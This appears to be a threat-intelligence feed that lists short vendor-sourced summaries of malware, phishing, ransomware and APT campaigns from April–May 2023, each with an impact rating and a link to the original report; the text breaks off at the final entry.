Source: https://cdn2.assets-servd.host/gifted-zorilla/production/files/Exploring-the-Rise-of-Israel-Based-BEC-Attacks.pdf

Intel Source:: Blackberry

Intel Name:: SideWinder_Using_Server_Based_Polymorphism_Technique

Date of Scan:: 2023-05-09

Impact:: LOW

Summary:: BlackBerry researchers have observed that APT Group SideWinder is accused of deploying a backdoor in attacks directed against Pakistan government organizations as part of a campaign that commenced in late November 2022.

Source: https://blogs.blackberry.com/en/2023/05/sidewinder-uses-server-side-polymorphism-to-target-pakistan

Intel Source:: Quickheal

Intel Name:: IRCTC_fake_apps

Date of Scan:: 2023-05-09

Impact:: LOW

Summary:: Quickheal analysts went through the recent advisory published by the Indian Railway Catering and Tourism Corporation (IRCTC), about the IRCTC fakeapps. The Fake IRCTC app pretends like it is real IRCTC app but is in reality a full-fledged spyware that spies on victims with ease.

Source: https://blogs.quickheal.com/beware-fake-applications-are-disguised-as-legitimate-ones/

Intel Source:: Cofense

Intel Name:: Microsoft_Phish_Redirects_Victims_to_Catering_Voice_Recording

Date of Scan:: 2023-05-09

Impact:: LOW

Summary:: Cofense researchers have observed credential phishing campaigns that use a novel deception technique, luring unsuspecting users into a false sense of security after they’ve given away their Microsoft login information.

Source: https://cofense.com/blog/the-art-of-deception-microsoft-phish-redirects-victims-to-a-catering-voice-recording/

Intel Source:: Fortinet

Intel Name:: AndoryuBot_Targeting_Ruckus_Wireless_Admin_Remote_Code_Execution_Vulnerability

Date of Scan:: 2023-05-09

Impact:: LOW

Summary:: FortiGate researchers have observed a unique botnet based on the SOCKS protocol distributed through the Ruckus vulnerability (CVE-2023-25717). It contains DDoS attack modules for different protocols and communicates with its command-and-control server using SOCKS5 proxies.

Source: https://www.fortinet.com/blog/threat-research/andoryubot-new-botnet-campaign-targets-ruckus-wireless-admin-remote-code-execution-vulnerability-cve-2023-25717?&web_view=true

Intel Source:: ASEC

Intel Name:: RecordBreaker_Stealer_Distributed_by_YouTube_Accounts

Date of Scan:: 2023-05-08

Impact:: LOW

Summary:: ASEC analyzed and confirmed the distribution of RecordBreaker through a YouTube account and possibly hacked recently. RecordBreaker is a new Infostealer version of Raccoon Stealer. It tries to pretend itself as a software installer and similar to CryptBot, RedLine, and Vidar. AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of RecordBreaker through a YouTube account that is assumed to have been recently hacked.

Source: https://asec.ahnlab.com/en/52072/

Intel Source:: CERT-UA

Intel Name:: SmokeLoader_and_RoarBAT_Malware_Attacks_Against_Ukraine

Date of Scan:: 2023-05-08

Impact:: MEDIUM

Summary:: CERT-UA researchers have identified an ongoing phishing campaign with invoice-themed lures being used to distribute the SmokeLoader malware in the form of a polyglot file.

Source: https://cert.gov.ua/article/4555802

Intel Source:: KrebsonSecurity

Intel Name:: US_Job_Services_Leaks_Customer_Data

Date of Scan:: 2023-05-08

Impact:: LOW

Summary:: Researchers from KrebsonSecurity have identified a huge tranche of full credit card records exposed online, and that at first glance the domain names involved appeared to be affiliated with the United States Postal Service.

Source: https://krebsonsecurity.com/2023/05/promising-jobs-at-the-u-s-postal-service-us-job-services-leaks-customer-data/?replytocom=583725

Intel Source:: Cleafy

Intel Name:: New_Web_Injection_Toolkit_DrIBAN_Targeting_Italian_Corporate_Banking_Clients

Date of Scan:: 2023-05-08

Impact:: MEDIUM

Summary:: Researchers from Cleafy have observed that Italian corporate banking clients are the target of an ongoing financial fraud campaign that has been leveraging a new web-inject toolkit called drIBAN since at least 2019.

Source: https://www.cleafy.com/cleafy-labs/uncovering-driban-fraud-operations-chapter1

Intel Source:: Mcafee

Intel Name:: New_MultiStage_Attack_and_Malware_Distribution_of_Amadey

Date of Scan:: 2023-05-08

Impact:: LOW

Summary:: McAfee Labs researchers have identified an increase in Wextract.exe samples, that drop a malware payload at multiple stages.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/deconstructing-amadeys-latest-multi-stage-attack-and-malware-distribution/

Intel Source:: Cyble

Intel Name:: Phishing_Sites_Spreading_RAT_Called_DarkWatchMan

Date of Scan:: 2023-05-08

Impact:: LOW

Summary:: Cyble researchers have identified a phishing website that imitated a renowned Russian website, CryptoPro CSP. TAs is using this website to distribute DarkWatchman malware.

Source: https://blog.cyble.com/2023/05/05/sophisticated-darkwatchman-rat-spreads-through-phishing-sites/

Intel Source:: Mcafee

Intel Name:: An_Increase_in_SHTML_Phishing_Attacks

Date of Scan:: 2023-05-08

Impact:: MEDIUM

Summary:: McAfee researchers have observed a new wave of phishing attacks. In this wave, the attacker has been abusing server-parsed HTML (SHTML) files. The SHTML files are commonly associated with web servers redirecting users to malicious, credential-stealing websites or displaying phishing forms locally within the browser to harvest user-sensitive information.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shtml-phishing-attack-with-blurred-image/

Intel Source:: Fortinet

Intel Name:: SideCopy_Group_Delivering_Malware_via_Phishing_Emails

Date of Scan:: 2023-05-08

Impact:: LOW

Summary:: FortiGate researchers have identified one file that referenced an Indian state military research organization and an in-development nuclear missile. The file is meant to deploy malware with characteristics matching the APT group SideCopy with activities dating back to at least 2019, this group has aligned its targeting with the goals and objectives of the Pakistani government.

Source: https://www.fortinet.com/blog/threat-research/clean-rooms-nuclear-missiles-and-sidecopy

Intel Source:: Meta

Intel Name:: Multiple_Malware_Targeting_Business_Users

Date of Scan:: 2023-05-07

Impact:: LOW

Summary:: Researchers from Meta have analyzed the persistent malware campaigns targeting businesses across the internet, including threat indicators to help raise the industry’s collective defenses across the internet.

Source: https://engineering.fb.com/2023/05/03/security/malware-nodestealer-ducktail/

Intel Source:: Netscope

Intel Name:: The_Analysis_of_CrossLock_Ransomware

Date of Scan:: 2023-05-07

Impact:: LOW

Summary:: Netskope researchers have identified a new ransomware named CrossLock. It emerged in April 2023, targeting a large digital certifier company in Brazil. This ransomware was written in Go, which has also been adopted by other ransomware groups, including Hive, due to the cross-platform capabilities offered by the language.

Source: https://www.netskope.com/blog/netskope-threat-coverage-crosslock-ransomware

Intel Source:: Cyble

Intel Name:: New_KEKW_Malware_Variant_Detected_in_PyPI_Packages

Date of Scan:: 2023-05-07

Impact:: LOW

Summary:: Cyble researchers have uncovered multiple malicious Python .whl (Wheel) files that are found to be distributing a new malware named ‘KEKW’. KEKW malware can steal sensitive information from infected systems, as well as perform clipper activities which can lead to the hijacking of cryptocurrency transactions.

Source: https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/

Intel Source:: Sophos

Intel Name:: DLL_sideloading_Attacks_Gain_New_Air_With_a_Doubled_Dragon_Breath

Date of Scan:: 2023-05-07

Impact:: LOW

Summary:: Sophos researchers have spotted malicious DLL sideloading activity that builds on the classic sideloading scenario but adds complexity and layers to its execution.

Source: https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/

Intel Source:: Lab52

Intel Name:: Mustang_Panda_New_Campaign_Against_Australia

Date of Scan:: 2023-05-07

Impact:: LOW

Summary:: Lab52 researchers have found a zip file named Biography of Senator the Hon Don Farrell.zip. Hon Don Farrell is the current Australian Secretary of State for Trade and Tourism, indicating a targeted campaign against Australia.

Source: https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/

Intel Source:: Sentilone

Intel Name:: The_Second_Variant_of_Atomic_Stealer_macOS_Malware

Date of Scan:: 2023-05-06

Impact:: LOW

Summary:: The threat actor, however, has been busy looking for other ways to target macOS users with a different version of Atomic Stealer. In this post, we take a closer look at how Atomic Stealer works and describe a previously unreported second variant. We also provide a comprehensive list of indicators to aid threat hunters and security teams defending macOS endpoints.

Source: https://www.sentinelone.com/blog/atomic-stealer-threat-actor-spawns-second-variant-of-macos-malware-sold-on-telegram/

Intel Source:: Sentilone

Intel Name:: Kimsuky_New_Global_Campaign

Date of Scan:: 2023-05-06

Impact:: MEDIUM

Summary:: SentinelLabs has observed ongoing attacks from Kimsuky, a North Korean state-sponsored APT that has a long history of targeting organizations across Asia, North America, and Europe. Ongoing campaigns use a new malware component called ReconShark, which is actively delivered to specifically attacked individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros. ReconShark operates as a reconnaissance tool with unique execution instructions and server communication methods. Recent activity has been linked to a broader set of skills are attributed to North Korea.

Source: https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/

Intel Source:: Cyble

Intel Name:: BlackBit_Ransomware

Date of Scan:: 2023-05-06

Impact:: MEDIUM

Summary:: AhnLab shared their analyses about BlackBit ransomware is being distributed in Korea. BlackBit Ransomware is a LokiLocker ransomware variant that based on the RaaS model. The source code of the BlackBit shows the ransomware is a copy of the LokiLocker with some new changes such as icons, name, color scheme. BlackBit ransomware is a sophisticated one with multipleseveral capabilities to establish persistence, defense evasion, and impair recovery.

Source: https://blog.cyble.com/2023/05/03/blackbit-ransomware-a-threat-from-the-shadows-of-lokilocker/

Intel Source:: ISC.SANS

Intel Name:: Infostealer_Embedded_in_a_Word_Document

Date of Scan:: 2023-05-06

Impact:: LOW

Summary:: Researchers from SANS have analyzed a malicious document which is an embedded object.

Source: https://isc.sans.edu/diary/Infostealer+Embedded+in+a+Word+Document/29810/

Intel Source:: Bushidotoken

Intel Name:: Raspberry_Robin_USB_malware_campaign

Date of Scan:: 2023-05-06

Impact:: LOW

Summary:: Bushidotoken blog shares the technical details about this malware and analyses how it runs, works, the commands it runs, the processes it uses, and in this case how C2 communications look like.

Source: https://blog.bushidotoken.net/2023/05/raspberry-robin-global-usb-malware.html

Intel Source:: PaloAlto

Intel Name:: Malware_IcedID_information_stealer_configuration_analyses

Date of Scan:: 2023-05-05

Impact:: LOW

Summary:: Palo Alto researchers shared an example of an IcedID malware (information stealer) configuration, how it was obfuscated and how they extracted it. It was one IcedID binary and how its configurations are encrypted.

Source: https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing/

Intel Source:: Eclecticiq

Intel Name:: Vidar_Infostealer_targeted_a_Polish_Healthcare_Industry

Date of Scan:: 2023-05-05

Impact:: LOW

Summary:: EclecticIQ researchers has observed a spearphishing email targeting the healthcare industry in Poland. The spoofed email looked like as real sent from a Polish government entity and contained a infectips Microsoft Excel XLL attachment that can download and execute Vidar Infostealer malware.

Source: https://blog.eclecticiq.com/polish-healthcare-industry-targeted-by-vidar-infostealer-likely-linked-to-djvu-ransomware

Intel Source:: CERT-UA

Intel Name:: Destructive_cyberattack_UAC_0165_on_the_public_sector_of_Ukraine_using_RoarBat

Date of Scan:: 2023-05-05

Impact:: MEDIUM

Summary:: Upon receiving information about interference in the information and communication system (ICS) of one of the state organizations of Ukraine, measures to investigate a cyber attack were initiated. It was found that the performance of electronic computing machines (server equipment, automated user workstations, data storage systems) was impaired as a result of the destructive influence carried out using the appropriate software.

Source: https://cert.gov.ua/article/4501891

Intel Source:: TrendMicro

Intel Name:: Earth_Longzhi_is_Back_With_New_Technique

Date of Scan:: 2023-05-04

Impact:: LOW

Summary:: TrendMicro researchers have discovered a new campaign by Earth Longzhi that is targeting organizations based in Taiwan, Thailand, the Philippines, and Fiji. The recent campaign follows months of dormancy, abuses a Windows Defender executable to perform DLL sideloading while also exploiting a vulnerable driver, zamguard64.sys, to disable security products installed on the hosts via a bring-your-own-vulnerable-driver (BYOVD) attack.

Source: https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html

Intel Source:: Mandiant

Intel Name:: The_Investigation_of_BRAINSTORM_and_RILIDE

Date of Scan:: 2023-05-04

Impact:: LOW

Summary:: Mandiant researchers have identified BRAINSTORM, a rust-based dropper, which ultimately led to RILIDE, a chromium-based extension first publicly reported by SpiderLabs. After careful investigation identified that the email and cryptocurrency theft ecosystem of RILIDE is larger than reported.

Source: https://www.mandiant.com/resources/blog/lnk-between-browsers

Intel Source:: Checkpoint

Intel Name:: North_Korean_Group_ScarCruft_Deploying_RokRAT_Malware

Date of Scan:: 2023-05-04

Impact:: LOW

Summary:: Checkpoint researchers have identified that the North Korean threat actor known as ScarCruft started experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default.

Source: https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/

Intel Source:: SocRadar

Intel Name:: Diving_Deep_into_BlackByte_Ransomware

Date of Scan:: 2023-05-03

Impact:: LOW

Summary:: Researchers from SOCRadar have analyzed the BlackByte ransomware. It is a Ransomware operation that began targeting corporate victims worldwide in July 2021. The first findings regarding the group emerged after victims sought help decrypting their files.

Source: https://socradar.io/dark-web-profile-blackbyte-ransomware/

Intel Source:: Prodaft

Intel Name:: Russian_APT_Hacked_Tajikistani_Carrier_to_Spy_on_Government_and_Public_Services

Date of Scan:: 2023-05-03

Impact:: MEDIUM

Summary:: Researchers from Prodaft have observed a Russian espionage group tracked as Nomadic Octopus spying on Tajikistan’s high-ranking government officials, public service infrastructures, and telecoms services, likely by infiltrating a mobile phone carrier.

Source: https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf

Intel Source:: Cyble

Intel Name:: Malware_Families_Leveraging_AresLoader_for_Distribution

Date of Scan:: 2023-05-03

Impact:: LOW

Summary:: Cyble researchers have observed a new loader called AresLoader that is used to spread several types of malware families. It is a loader malware written in the C programming language that first emerged in cybercrime forums and Telegram channels in 2022.

Source: https://blog.cyble.com/2023/04/28/citrix-users-at-risk-aresloader-spreading-through-disguised-gitlab-repo/

Intel Source:: PaloAlto

Intel Name:: Internet_Threats_Are_Impersonating_Common_Industries_via_Phishing_Attacks_Web_Skimmer_Analysis_and_Many_More

Date of Scan:: 2023-05-03

Impact:: LOW

Summary:: PaloAlto researchers have observed the internet threat landscape and analyzed malicious URL distribution, geolocation, category analysis, and statistics describing attempted malware attacks. Also, this includes industry sectors being targeted for spoofing in phishing pages, as well as downloaded malware statistics, injected JavaScript malware analysis, and malicious DNS analysis.

Source: https://unit42.paloaltonetworks.com/internet-threats-late-2022/

Intel Source:: ASEC

Intel Name:: CoinMiner_Distributing_to_Linux_SSH_Servers

Date of Scan:: 2023-05-03

Impact:: LOW

Summary:: ASEC researchers have discovered XMRig CoinMiner being installed on poorly managed Linux SSH servers. The attacks have been happening with a distinct pattern since 2022, they involve the usage of malware developed with Shell Script Compiler when installing the XMRig, as well as the creation of a backdoor SSH account.

Source: https://asec.ahnlab.com/en/51908/

Intel Source:: TrendMicro

Intel Name:: Ransomware_Family_Rapture_is_Similar_to_Paradise

Date of Scan:: 2023-05-01

Impact:: MEDIUM

Summary:: TrendMicro researchers have observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. The findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack.

Source: https://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html

Intel Source:: Guardio

Intel Name:: The_Unstoppable_Malverposting_Continues

Date of Scan:: 2023-05-01

Impact:: LOW

Summary:: In this post Gardio vresearchers shared the huge numbers of IOC detections of Malverposting, and also very detailed analyses of this one campaign using adult-rated click bates delivering sophisticated malware — making it even harder for detection, and too easy to mass propagate.

Source: https://labs.guard.io/malverposting-with-over-500k-estimated-infections-facebook-ads-fuel-this-evolving-stealer-54b03d24b349

Intel Source:: Elastic

Intel Name:: New_LOBSHOT_Malware_Deploying_Via_Google_Ads

Date of Scan:: 2023-05-01

Impact:: LOW

Summary:: Researchers from Elastic Security Labs have observed one malware family called LOBSHOT. It continues to collect victims while remaining undetected. Also, the infrastructure belongs to TA505, the well-known cybercriminal group associated with Dridex, Locky, and Necurs campaigns.

Source: https://www.elastic.co/security-labs/elastic-security-labs-discovers-lobshot-malware

Intel Name:: ASEC_Weekly_Phishing_Email_analyses_April_9_15th_2023

Date of Scan:: 2023-05-01

Impact:: LOW

Summary:: ASEC lab researchers continiusly monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from April 9th, 2023 to April 15st, 2023 and provide statistical information on each type.

Source: https://asec.ahnlab.com/en/51821/

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Malware_Statistics

Date of Scan:: 2023-05-01

Impact:: LOW

Summary:: The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from November 21st, 2022 (Monday) to November 27th (Sunday).

Source: https://asec.ahnlab.com/en/43255/

Intel Source:: Fortinet

Intel Name:: The_Overview_of_UNIZA_Ransomware

Date of Scan:: 2023-05-01

Impact:: LOW

Summary:: Fortinet researchers have discovered a new ransomware variant called UNIZA. Like other ransomware variants. It uses the Command Prompt (cmd.exe) window to display its ransom message, and interestingly, it does not append the filename of the files it encrypts, making it more difficult to determine which files have been impacted.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-uniza-coverage

Intel Source:: Mitiga

Intel Name:: A_malicious_Mitiga_document

Date of Scan:: 2023-05-01

Impact:: LOW

Summary:: Last January, an attacker uploaded a malicious .docx file to Virus Total. He used several of Mitiga’s publicly available branding elements which included logo, fonts and colors, to lend credibility to the document.

Source: https://www.mitiga.io/blog/mitiga-advisory-virus-total

Intel Source:: Trellix

Intel Name:: Threat_Actors_Leveraging_SEO_Poisoning

Date of Scan:: 2023-05-01

Impact:: LOW

Summary:: Trellix researchers have identified that hackers continue to innovate their techniques to infect victims, with SEO poisoning being one of the recent trends.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/no-more-macros-better-watch-your-search-results.html

Intel Source:: Malwarebytes

Intel Name:: An_Ongoing_Magecart_Campaign

Date of Scan:: 2023-04-30

Impact:: LOW

Summary:: Malwarebytes researchers have identified an ongoing Magecart campaign that is leveraging realistic-looking fake payment screens to capture sensitive data entered by unsuspecting users.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/04/kritec-art

Intel Source:: CERT-UA

Intel Name:: Hackers_From_APT28_Group_Distributing_Emails_With_Instructions_on_Updating_OS

Date of Scan:: 2023-04-30

Impact:: MEDIUM

Summary:: CERT-UA researchers have observed the distribution of emails with subject "Windows Update", allegedly sent on behalf of system administrators of departments. At the same time, senders' email addresses created on the @outlook.com public service can be formed using the real name and initials of the employee.

Source: https://cert.gov.ua/article/4492467

Intel Source:: Welivesecurity

Intel Name:: APT_Group_Panda_Delivering_Malware_via_Software_Updates

Date of Scan:: 2023-04-27

Impact:: HIGH

Summary:: ESET researchers discovered a new campaign by the APT group known as Evasive Panda targeting an international NGO in China with malware delivered through updates of popular Chinese software.

Source: https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/

Intel Source:: TrendMicro

Intel Name:: TrafficStealer_Abusing_Open_Container_APIs

Date of Scan:: 2023-04-27

Impact:: LOW

Summary:: Researchers from TrendMicro have discovered a different type of attack, a piece of software that leverages Docker containers to generate money through monetized traffic. Although the piece of software itself appears to be legitimate, it likely has compromised components that result in monitoring as a potentially unwanted application.

Source: https://www.trendmicro.com/en_us/research/23/d/attackers-use-containers-for-profit-via-trafficstealer.html

Intel Source:: Uptycs

Intel Name:: RTM_Locker_Ransomware_as_a_Service_Now_Suits_Linux_Architecture

Date of Scan:: 2023-04-27

Impact:: LOW

Summary:: Uptycs researchers have discovered a new ransomware binary attributed to the RTM group, a known ransomware-as-a-service (RaaS) provider. This is the first time the group has created a Linux binary. Its locker ransomware infects Linux, NAS, and ESXi hosts and appears to be inspired by Babuk ransomware's leaked source code.

Source: https://www.uptycs.com/blog/rtm-locker-ransomware-as-a-service-raas-linux

Intel Source:: Sekoia

Intel Name:: Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_new

Date of Scan:: 2023-04-27

Impact:: MEDIUM

Summary:: Sekoia researchers have identified the infection chain that is using about a hundred fake cracked software catalog websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub.

Source: https://blog.sekoia.io/unveiling-of-a-large-resilient-infrastructure-distributing-information-stealers/

Intel Source:: Cyble

Intel Name:: Hackers_Selling_New_Atomic_macOS_Stealer_on_Telegram

Date of Scan:: 2023-04-27

Impact:: LOW

Summary:: Cyble Researchers have discovered a Telegram channel advertising a new information-stealing malware called Atomic macOS Stealer (AMOS). The malware is specifically designed to target macOS and can steal sensitive information from the victim’s machine.

Source: https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/

Intel Source:: Aqua

Intel Name:: The_Exploiting_of_Kubernetes_RBAC_by_attackers

Date of Scan:: 2023-04-27

Impact:: LOW

Summary:: Aqua researchers have observed new evidence that attackers are exploiting Kubernetes (K8s) Role-Based Access Control (RBAC) in the wild to create backdoors. The attackers also tried to lunch a DaemonSets to take control and seize resources of the K8s clusters they attack. Aqua analyses suspects that this campaign is actively targeting at least 60 clusters in the wild.

Source: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters

Intel Source:: PaloAlto

Intel Name:: PingPull_Malware_is_Updated_by_Chinese_Alloy_Taurus

Date of Scan:: 2023-04-27

Impact:: LOW

Summary:: Unit 42 researchers have identified a new variant of PingPull malware used by Alloy Taurus actors designed to target Linux systems. While following the infrastructure leveraged by the actor for this PingPull variant, we also identified their use of another backdoor we track as Sword2033.

Source: https://unit42.paloaltonetworks.com/alloy-taurus/

Intel Source:: Bitdefender

Intel Name:: The_BellaCiao_Malware_of_Iran

Date of Scan:: 2023-04-27

Impact:: MEDIUM

Summary:: BitDefender researchers have observed the modernization of Charming Kitten’s tactics, techniques, and procedures, including a new, previously unseen malware. This malware is tailored to suit individual targets and exhibits a higher level of complexity, evidenced by a unique communication approach with its command-and-control (C2) infrastructure.

Source: https://businessinsights.bitdefender.com/unpacking-bellaciao-a-closer-look-at-irans-latest-malware

Intel Source:: Cyble

Intel Name:: PaperCut_actively_exploited_in_the_Wild

Date of Scan:: 2023-04-27

Impact:: MEDIUM

Summary:: Earlier this month, PaperCut shared a Security alert stating, they have an evidence that unpatched servers are being exploited in the wild. Russian Hacker Suspected Exploiting the PaperCut Vulnerability. The advisories provided by vendors shared insights into the two CVEs – CVE-2023-27350 (Severity: Critical) & CVE-2023-27351(Severity: High). Cyble researchers shared their details for the same in their post.

Source: https://blog.cyble.com/2023/04/25/print-management-software-papercut-actively-exploited-in-the-wild/

Intel Source:: ASEC

Intel Name:: RokRAT_Malware_Distributing_Through_LNK_Files

Date of Scan:: 2023-04-26

Impact:: LOW

Summary:: ASEC researchers have observed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month, has also recently distributed the RokRAT malware through LNK files.

Source: https://asec.ahnlab.com/en/51751/

Intel Source:: Infoblox

Intel Name:: Finding_Decoy_Dog_Toolkit_via_Anomalous_DNS_Traffic

Date of Scan:: 2023-04-26

Impact:: LOW

Summary:: Researchers from Infoblox have identified a new malware toolkit named Decoy Dog, that has been discovered that allows attackers to avoid standard detection techniques and target enterprises. It uses DNS query dribbling and strategic domain aging techniques to bypass security checks.

Source: https://blogs.infoblox.com/cyber-threat-intelligence/cyber-threat-advisory/dog-hunt-finding-decoy-dog-toolkit-via-anomalous-dns-traffic/

Intel Source:: ISC.SANS

Intel Name:: Phishing_Attack_Increasing_in_Singapore_for_Tax_Portal

Date of Scan:: 2023-04-26

Impact:: LOW

Summary:: Researchers from SANS have identified an IRAS phishing website that looks legitimate, this website asks users to input their Singapore Personal Access (Singpass) credentials to access government and private services (such as banking) in Singapore.

Source: https://isc.sans.edu/diary/Strolling+through+Cyberspace+and+Hunting+for+Phishing+Sites/29780/

Intel Source:: Zero Day Initiative (ZDI)

Intel Name:: New_the_Mirai_botnet_exploit

Date of Scan:: 2023-04-26

Impact:: MEDIUM

Summary:: The Zero Day Initiative threat-hunting team discovered recently new exploit attempts in Eastern Europe showing that the Mirai botnet has updated its version to CVE-2023-1389, known as ZDI-CAN-19557/ZDI-23-451. This malicious activity in the TP-Link Archer AX21 Wi-Fi router was originally disclosed to ZDI during the Pwn2Own Toronto event, where it was used by Team Viettel in their LAN-side entry against the TP-Link device and by Qrious Security in their WAN-side entry.

Source: https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal

Intel Source:: ASEC

Intel Name:: Tonto_Team_Using_Anti_Malware_Related_Files_for_DLL_Side_Loading

Date of Scan:: 2023-04-26

Impact:: LOW

Summary:: Researchers from ASEC have identified the Tonto Team threat group is targeting mainly Asian countries and has been distributing Bisonal malware

Source: https://asec.ahnlab.com/en/51746/

Intel Source:: Securelist

Intel Name:: The_Analysis_of_Tomiris_Group

Date of Scan:: 2023-04-25

Impact:: LOW

Summary:: Securelist researchers have continued to track Tomiris as a separate threat actor over three new attack campaigns between 2021 and 2023 and it is targeting government and diplomatic entities in the CIS.

Source: https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

Intel Source:: Checkpoint

Intel Name:: New_Findings_of_Educated_Manticore

Date of Scan:: 2023-04-25

Impact:: MEDIUM

Summary:: Researchers from Checkpoint have revealed new findings of an activity cluster closely related to Phosphorus. It presents a new and improved infection chain leading to the deployment of a new version of PowerLess. This implant is attributed to Phosphorus in the past, an Iran-affiliated threat group operating in the Middle East and North America.

Source: https://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/

Intel Source:: ReversingLabs

Intel Name:: Repurposing_Package_Name_on_PyPI_to_Push_Malware

Date of Scan:: 2023-04-25

Impact:: LOW

Summary:: Researchers from Reversing Labs have observed that a malicious package on the Python Package Index (PyPI) named termcolour, a three-stage downloader published in multiple versions.

Source: https://www.reversinglabs.com/blog/package-names-repurposed-to-push-malware-on-pypi

Intel Source:: Cofense

Intel Name:: After_15_Years_release_Open_Source_Gh0st_RAT_still_Haunting_Inboxes

Date of Scan:: 2023-04-25

Impact:: LOW

Summary:: Cofense Intelligence Unit discovered Gh0st RAT, old open-source RAT, that is targeting a healthcare organization. Gh0st RAT was created by a Chinese hacking group named C. The public release of Gh0st RAT source code made it easy for threat actors to manipulate victims. Their information-stealing capabilities: taking full control of the infected machine, recording keystrokes in real time with offline logging available, accessing live web cam feeds including microphone recording, downloading files remotely, remote shutdown and reboot, disabling user input

Source: https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/

Intel Source:: Securonix Threat Labs

Intel Name:: New_OCX_HARVESTER_Attack_Campaign_Using_Modernized_More_Eggs_Suite

Date of Scan:: 2023-04-24

Impact:: MEDIUM

Summary:: Securonix Threat Labs researchers have observed a new attack campaign tracked as OCX#HARVESTER. Some of the malicious payloads leveraged as part of the attack campaign observed appear to be related to the More_eggs malicious payloads reported earlier.

Source: https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/

Intel Source:: Huntress

Intel Name:: Zero_Day_Vulnerabilities_in_PaperCut_Print_Management_Software

Date of Scan:: 2023-04-24

Impact:: LOW

Summary:: Researchers from Huntress have tracked the exploitation of zero-day vulnerabilities against PaperCut MF/NG which allow for unauthenticated remote code execution due to an authentication bypass.

Source: https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software

Intel Source:: Cyble

Intel Name:: The_QakBot_Malware_Continues_to_Evolve

Date of Scan:: 2023-04-24

Impact:: LOW

Summary:: Cyble Research Intelligence Labs have observed that several malware families, such as AsyncRAT, QuasarRAT, DCRAT, etc., have been found using OneNote attachments as part of their tactics. In February 2023, the well-known malware, Qakbot, started using OneNote attachments in their spam campaigns.

Source: https://blog.cyble.com/2023/04/21/qakbot-malware-continues-to-morph/

Intel Source:: Jamf

Intel Name:: BlueNoroff_APT_Group_Targeting_macOS_With_RustBucket_Malware

Date of Scan:: 2023-04-24

Impact:: LOW

Summary:: Jamf Threat Labs have discovered a macOS malware family that communicates with command and control (C2) servers to download and execute various payloads. They track and protect against this malware family under the name ‘RustBucket’ and suspect it to be attributed to a North Korean, state-sponsored threat actor.

Source: https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/

Intel Source:: Symantec

Intel Name:: X_Trader_Supply_Chain_Attack_Affecting_Critical_Infrastructure_Organizations_in_US_and_Europe

Date of Scan:: 2023-04-24

Impact:: MEDIUM

Summary:: Researchers from Symantec have identified that North Korean-linked operations affected more organizations beyond 3CX, including two critical infrastructure organizations in the energy sector.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain

Intel Source:: TrendMicro

Intel Name:: ViperSoftX_Encryption_Updates

Date of Scan:: 2023-04-24

Impact:: LOW

Summary:: TrendMicro researchers have observed cryptocurrency and information stealer ViperSoftX evading initial loader detection and making its lure more believable by making the initial package loader via cracks, keygens, activators, and packers non-malicious.

Source: https://www.trendmicro.com/en_us/research/23/d/vipersoftx-updates-encryption-steals-data.html

Intel Source:: PaloAlto

Intel Name:: Scams_Involving_ChatGPT_Are_on_the_Rise

Date of Scan:: 2023-04-22

Impact:: LOW

Summary:: Unit42 researchers have monitored the newly registered domains and squatting domains related to ChatGPT, as it is one of the fastest-growing consumer applications in history. The dark side of this popularity is that ChatGPT is also attracting the attention of scammers seeking to benefit from using wording and domain names that appear related to the site.

Source: https://unit42.paloaltonetworks.com/chatgpt-scam-attacks-increasing/

Intel Source:: Sophos

Intel Name:: Two_New_QakBot_C2_Servers_Detected

Date of Scan:: 2023-04-22

Impact:: LOW

Summary:: Sophos researchers have detected two new QakBot servers that have not yet been publicly identified. These servers are used by threat actors to manage and control QakBot infections, a banking trojan that has been active since 2008 and primarily targets financial institutions and their customers.

Source: https://news.sophos.com/en-us/2023/04/20/new-qakbot-c2-servers-detected-with-sophos-ndr/

Intel Source:: Welivesecurity

Intel Name:: Lazarus_Hackers_Pushing_Linux_Malware_via_Fake_Job_Offers

